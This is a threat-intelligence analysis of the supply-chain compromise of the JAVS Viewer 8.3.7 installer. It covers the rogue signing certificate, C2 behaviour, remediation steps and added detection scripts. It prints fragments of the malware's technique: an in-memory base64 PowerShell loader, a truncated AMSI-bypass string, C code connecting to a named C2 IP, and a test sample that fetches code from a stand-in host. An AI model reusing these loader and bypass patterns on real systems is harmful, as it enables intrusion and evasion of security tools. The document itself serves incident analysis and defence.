Justice AV Solutions (JAVS), a prominent U.S.-based company specializing in digital audio-visual recording solutions for courtroom environments, recently faced a significant security incident. The supply chain attack involved a backdoored installer for the JAVS Viewer software, version 8.3.7.
This Threatfeed dissects the incident in technical detail, from the signing anomaly on the installer to the behaviour of the dropped binary, to provide a comprehensive understanding of the breach.
Background
Company Profile
JAVS technologies are integral to numerous judicial and governmental environments. Their solutions are deployed in over 10,000 installations globally, encompassing courtrooms, chambers, jury rooms, and various official facilities.
Incident Overview
The compromised version of the software, JAVS Viewer v8.3.7, was identified as containing a malicious installer that grants attackers full control over affected systems. Users of this version must take immediate remediation actions, including re-imaging endpoints and resetting credentials.
Attack Vector Analysis
Initial Detection
On May 10, 2024, an investigation commenced following an alert related to the execution of a suspicious binary, fffmpeg.exe, within the installation directory of JAVS Viewer 8. Further analysis traced the infection to the installer, JAVS Viewer Setup 8.3.7.250-1.exe, downloaded from the official JAVS site on March 5, 2024.
Malicious Installer Details
The installer was found to be signed with an unexpected Authenticode certificate issued to “Vanguard Tech Limited” rather than the legitimate “Justice AV Solutions Inc.” The binary fffmpeg.exe, an apparent variant of the GateDoor/Rustdoor malware, executed encoded PowerShell scripts to establish unauthorized remote access.
Technical Dissection
Authenticode Signature Discrepancy
The installer and the fffmpeg.exe binary were signed by “Vanguard Tech Limited.” This anomaly indicated a breach in the software supply chain, as legitimate JAVS binaries are typically signed by “Justice AV Solutions Inc.”
Malware Execution Path
Upon execution, fffmpeg.exe established communication with a command-and-control (C2) server, transmitting detailed information about the host system. This included the hostname, operating system details, processor architecture, working directory, and username.
PowerShell Scripts
The executed PowerShell scripts were designed to bypass security mechanisms, such as the Anti-Malware Scan Interface (AMSI) and Event Tracing for Windows (ETW). The scripts then attempted to download additional payloads, further compromising the system.
```powershell
# Encoded PowerShell script example (the loader pattern described above;
# the encoded payload itself is elided)
$s = '…encoded script…'
# Base64-decode the payload into a UTF-8 script string
$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($s))
# Execute the decoded script in memory, so nothing is written to disk
Invoke-Expression $decoded
```
Exploitation Timeline
Feb 10, 2024: A certificate was issued for “Vanguard Tech Limited.”
Feb 21, 2024: The first malicious JAVS Viewer package was signed with the Vanguard certificate.
Mar 12, 2024: The second malicious package was signed.
April 2, 2024: A Twitter user highlighted malware on the JAVS downloads page.
May 10, 2024: The initial alert led to the discovery of the malicious installer.
May 13, 2024: A second malicious installer was still being served by the JAVS site.
Impact and Mitigation
System Compromise
The compromised fffmpeg.exe facilitated persistent remote access, enabling the attacker to execute commands and potentially deploy further malware. Analysis of network traffic confirmed the binary’s communication with a C2 server.
Remediation Steps
Re-image Affected Endpoints: Completely re-image any endpoints with JAVS Viewer 8.3.7 installed.
Credential Reset: Reset all credentials for accounts used on affected systems, including local and remote accounts.
Update Software: Install the latest version of JAVS Viewer (8.3.8 or higher) post-re-imaging.
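The signer check from the Authenticode discrepancy above and the first remediation step (finding endpoints that still run 8.3.7) can be combined into one hunt script. This is an added example, not JAVS code or the write-up's own; the install directories and the "JAVS Viewer*" DisplayName pattern are assumptions.

```powershell
# Added example (not JAVS code or the write-up's own): inventory JAVS Viewer
# installs and verify Authenticode signers against the expected publisher.
# Install directories and the 'JAVS Viewer*' DisplayName pattern are assumptions.
$ExpectedPublisher = 'Justice AV Solutions Inc.'   # legitimate signer named in the write-up
$SuspectPublisher  = 'Vanguard Tech Limited'        # signer observed on the backdoored build
$FixedVersion      = [version]'8.3.8'               # first version the write-up calls safe

# 1. Find installed JAVS Viewer versions via the Uninstall registry keys.
$uninstallKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall',
                 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall'
Get-ChildItem -Path $uninstallKeys -ErrorAction SilentlyContinue | Get-ItemProperty |
    Where-Object { $_.DisplayName -like 'JAVS Viewer*' } |
    ForEach-Object {
        $v = $_.DisplayVersion -as [version]
        $state = if ($null -eq $v) { 'UNKNOWN VERSION' }
                 elseif ($v -lt $FixedVersion) { 'AFFECTED - re-image and reset credentials' }
                 else { 'patched' }
        '{0} {1}: {2}' -f $_.DisplayName, $_.DisplayVersion, $state
    }

# 2. Check the signer of every PE file under the assumed install locations.
$installDirs = @("$env:ProgramFiles\JAVS\Viewer 8", "${env:ProgramFiles(x86)}\JAVS\Viewer 8") |
    Where-Object { Test-Path -LiteralPath $_ }
$findings = foreach ($dir in $installDirs) {
    Get-ChildItem -Path $dir -Recurse -Include *.exe, *.dll -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $sig     = Get-AuthenticodeSignature -FilePath $_.FullName
            $subject = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<unsigned>' }
            $verdict = if ($_.Name -ieq 'fffmpeg.exe')                  { 'KNOWN-BAD FILENAME' }
                       elseif ($subject -like "*$SuspectPublisher*")     { 'SUSPECT SIGNER' }
                       elseif ($subject -notlike "*$ExpectedPublisher*") { 'UNEXPECTED SIGNER' }
                       elseif ($sig.Status -ne 'Valid')                  { 'BAD SIGNATURE' }
                       else                                              { 'OK' }
            [pscustomobject]@{ File = $_.FullName; Status = $sig.Status; Signer = $subject; Verdict = $verdict }
        }
}
$findings | Where-Object { $_.Verdict -ne 'OK' } | Format-Table -AutoSize
```

Any endpoint that reports AFFECTED, or any file with a verdict other than OK, belongs in the re-image and credential-reset queue rather than in a clean-up attempt.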
Detailed Code Analysis
Binary Structure
The installer bundled multiple files, including a Dll2.dll, which contained a “HelloWorld” string indicating a possible test compilation.
```c
// Example of suspicious DLL code: the exported "HelloWorld" test function
// whose string was found in Dll2.dll
#include <stdio.h>

__declspec(dllexport) void HelloWorld(void)
{
    printf("Hello, World!");
}
```
Obfuscation Techniques
The PowerShell scripts employed obfuscation to evade detection and disable security features. Deobfuscation revealed attempts to download additional malicious payloads.
```powershell
# De-obfuscated PowerShell script (excerpt; the body of the AMSI tampering
# string is elided in the original)
$bypassAMSI = '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils")...'
# Execute the string in memory
Invoke-Expression $bypassAMSI
```
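Both the encoded loader shown in the PowerShell Scripts section and the de-obfuscated AMSI string above surface in process-creation telemetry as base64 on the command line. The detection below is an added example (not from the original post) that decodes such command lines and flags the AMSI/ETW-tampering and download indicators the write-up describes; the sample command lines are constructed and the indicator list is an assumption.

```powershell
# Added example (not from the original post): decode -EncodedCommand and
# FromBase64String payloads in process-creation command lines and flag the
# AMSI/ETW-tampering and download indicators described above. The sample
# command lines are constructed and the indicator list is an assumption.
$Indicators = @(
    'AmsiUtils', 'amsiInitFailed', 'AmsiScanBuffer',   # AMSI tampering
    'EtwEventWrite', 'Automation.Tracing',             # ETW tampering
    'Invoke-Expression', 'FromBase64String', 'DownloadString', 'Net.WebClient'
)

function Expand-EncodedCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    # -EncodedCommand/-enc/-e carry UTF-16LE base64; FromBase64String(...) arguments
    # are decoded as UTF-8, matching the loader excerpt shown earlier.
    $decoded = @()
    try {
        if ($CommandLine -match '(?i)\s-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})') {
            $decoded += [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1]))
        }
        foreach ($m in [regex]::Matches($CommandLine, 'FromBase64String\([''"]([A-Za-z0-9+/=]{16,})[''"]\)')) {
            $decoded += [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($m.Groups[1].Value))
        }
    } catch { $decoded += "<undecodable base64: $($_.Exception.Message)>" }
    $decoded
}

function Test-CommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)
    $hits = [System.Collections.Generic.List[string]]::new()
    foreach ($text in @($CommandLine) + @(Expand-EncodedCommand $CommandLine)) {
        foreach ($ind in $Indicators) {
            if ($text -like "*$ind*" -and -not $hits.Contains($ind)) { $hits.Add($ind) }
        }
    }
    [pscustomobject]@{
        Suspicious  = $hits.Count -ge 2      # two or more indicators: escalate
        Indicators  = $hits -join ', '
        CommandLine = $CommandLine
    }
}

# Constructed sample: a benign admin command and a stand-in for the encoded loader
# (the AMSI string is truncated exactly as in the write-up's excerpt).
$inner = '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils")...; ' +
         'Invoke-Expression (New-Object Net.WebClient).DownloadString("http://c2.invalid/stage2")'
$enc   = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($inner))
'powershell.exe -NoProfile -Command Get-Service WinRM', "powershell.exe -nop -w hidden -enc $enc" |
    ForEach-Object { Test-CommandLine $_ } | Format-Table -AutoSize -Wrap
```

The benign line reports no indicators; the encoded one decodes to AmsiUtils, Invoke-Expression, Net.WebClient and DownloadString and is marked Suspicious.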
Command-and-Control Communication
The binary fffmpeg.exe used Windows sockets and WinHTTP requests to establish communication with the C2 server, sending host details and awaiting further instructions.
```c
// Example C2 communication code snippet
#include <windows.h>
#include <winhttp.h>

// Open a WinHTTP session with a fixed User-Agent string
HINTERNET hSession = WinHttpOpen(L"A Custom User Agent/1.0",
                                 WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
                                 WINHTTP_NO_PROXY_NAME,
                                 WINHTTP_NO_PROXY_BYPASS, 0);
// Connect to the C2 host observed during the analysis (plain HTTP)
HINTERNET hConnect = WinHttpConnect(hSession, L"45.120.177.178",
                                    INTERNET_DEFAULT_HTTP_PORT, 0);
```